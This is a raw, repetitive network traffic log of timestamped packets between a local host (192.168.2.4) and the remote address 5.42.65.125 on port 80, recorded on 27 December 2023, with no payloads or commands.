Dec 27, 2023 18:12:23.397125959 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.397177935 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.399832964 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.399847031 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.399890900 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.402549028 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.402564049 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.402616024 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.405246019 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.405258894 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.405319929 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.407957077 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.407970905 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.408016920 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.410592079 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.410605907 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.410646915 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.413261890 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.413274050 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.413310051 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.415930986 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.415946007 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.415987015 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.418843031 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.418950081 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.418993950 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.421147108 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.421159983 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.421209097 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.423698902 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.423712969 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.423753023 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.426299095 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.426314116 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.426368952 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.428977966 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.429001093 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.429069042 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.431693077 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.431706905 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.431798935 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.433936119 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.433948040 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.434000969 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.436438084 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.436454058 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.436516047 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.438883066 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.438904047 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.438966036 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.441309929 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.441345930 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.441405058 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.443793058 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.443814993 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.443873882 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.446279049 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.446293116 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.446341991 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.448668957 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.448682070 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.448744059 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.451072931 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.451085091 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.451126099 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.453473091 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.453486919 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.453553915 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.455890894 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.455904007 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.455961943 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.458240032 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.458297014 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.458396912 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.460632086 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.460669041 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.460717916 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.462923050 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.462954998 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.462995052 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.465230942 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.465262890 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.465858936 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.467516899 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.467552900 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.467668056 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.469809055 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.469829082 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.469871998 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.472093105 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.472105026 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.472141981 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.474412918 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.474426031 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.474478006 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.476651907 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.476665974 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.476708889 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.478848934 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.478863001 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.478905916 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.481021881 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.481040955 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.481091022 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.483171940 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.483213902 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.483258009 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.485390902 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.485423088 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.485481977 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.487519979 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.487533092 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.487574100 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.489814043 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.489828110 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.489864111 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.491794109 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.491830111 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.494016886 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.494029045 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.494065046 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.496190071 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.496202946 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.496243000 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.498106956 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.498126984 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.498177052 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.500221968 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.500272036 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.500329018 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.502283096 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.502295971 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.502340078 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.504353046 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.504367113 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.504422903 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.506386042 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.506400108 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.506431103 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.508445024 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.508492947 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.508537054 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.510365963 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.510377884 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.510426998 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.512425900 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.512439966 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.512475967 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.514379025 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.514391899 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.514439106 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.516258001 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.516271114 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.516324997 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.518336058 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.518381119 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.518431902 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.520184040 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.520195961 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.520255089 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.522103071 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.522120953 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.522172928 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.524024010 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.524036884 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.524092913 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.525895119 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.525938034 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.525990963 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.527812004 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.527825117 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.527862072 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.529771090 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.529783964 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.529839039 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.531508923 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.531582117 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.531632900 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.533395052 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.533406973 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.533463955 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.535232067 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.535244942 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.535290956 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.537049055 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.537084103 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.537940979 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.538875103 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.538887978 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.538928986 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.541424036 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.541481018 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.542457104 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.542469978 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.542501926 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.542526960 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.544250965 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.544265032 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.544312000 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.546077013 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.546128035 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.546842098 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.547771931 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.547784090 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.547818899 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.549530983 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.549544096 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.549575090 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.551275015 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.551287889 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.551327944 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.553003073 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.553020954 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.553069115 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.554666996 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.554712057 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.554838896 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.556637049 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.556653023 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.558832884 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.560419083 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.560432911 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.560466051 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.563287020 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.563299894 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.563358068 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.566623926 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.566637039 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.566692114 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.570777893 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.570791006 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.570832968 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.573143959 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.573158026 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.573215008 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.576180935 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.576214075 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.576265097 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.579520941 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.579533100 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.579576015 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.582617998 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.582629919 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.582693100 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.587431908 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.587450027 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.587497950 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.588639975 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.588654041 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.588695049 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.591996908 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.592010021 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.592053890 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.594810963 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.594822884 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.594881058 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.598232985 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.598247051 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.598292112 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.602704048 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.602849007 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.605694056 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.605705976 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.605743885 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.607162952 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.607176065 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.607244015 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.610007048 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.610060930 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.610110998 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.617947102 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.617959023 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.618009090 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.618869066 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.618880987 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.618937016 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.621268034 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.621282101 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.621340036 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.625343084 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.625360012 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.625412941 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.625905037 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.625936031 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.625993013 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.627316952 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.627330065 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.627365112 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.630342960 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.630356073 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.630403996 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.633491039 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.633503914 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.633543968 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.635763884 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.635776043 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.635819912 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.638606071 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.638619900 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.638652086 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.641436100 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.641470909 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.642828941 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.643912077 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.643924952 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.643955946 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.646785021 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.646799088 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.646838903 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.649425983 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.649437904 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.649468899 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.652321100 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.652333975 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.652373075 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.655673981 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.655687094 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.655725956 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.657531023 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.657542944 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.657581091 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.660994053 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.661391973 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.661405087 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.661433935 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.663117886 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.663152933 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.663192987 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.665539026 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.665551901 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.665584087 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.668128967 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.668164968 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.668216944 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.670653105 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.670666933 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.670711040 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:23.673444986 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.673458099 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:23.673517942 CET	49738	80	192.168.2.4	5.42.65.125
